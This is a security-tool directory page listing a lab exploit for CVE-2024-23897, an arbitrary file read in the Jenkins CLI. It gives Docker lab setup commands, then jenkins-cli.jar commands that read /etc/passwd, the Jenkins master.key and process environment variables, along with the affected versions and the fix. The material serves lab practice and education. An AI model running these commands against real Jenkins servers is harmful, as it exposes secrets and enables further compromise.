Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-23897 | Kitploit
Tools/GitHubGitHub/dungsocool/cve-2024-23897
Vulnerability ScannersExploitationWeb SecurityLearning & EducationLabs & Practice
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

View Repository
1 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-23897 — Jenkins CLI Arbitrary File Read

Quick Start

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

Details

See REPORT.md for the full technical analysis (Vietnamese).

ItemValue
CVSS9.8 (Critical)
AffectedJenkins <= 2.441, LTS <= 2.426.2
Lab versionjenkins/jenkins:2.426.2-lts
Root causeargs4j expandAtFiles enabled on server-side CLI
FixUpgrade to Jenkins >= 2.442 / LTS >= 2.426.3

Cleanup

root@kitploit:~
docker-compose down -v --remove-orphans
Download Tool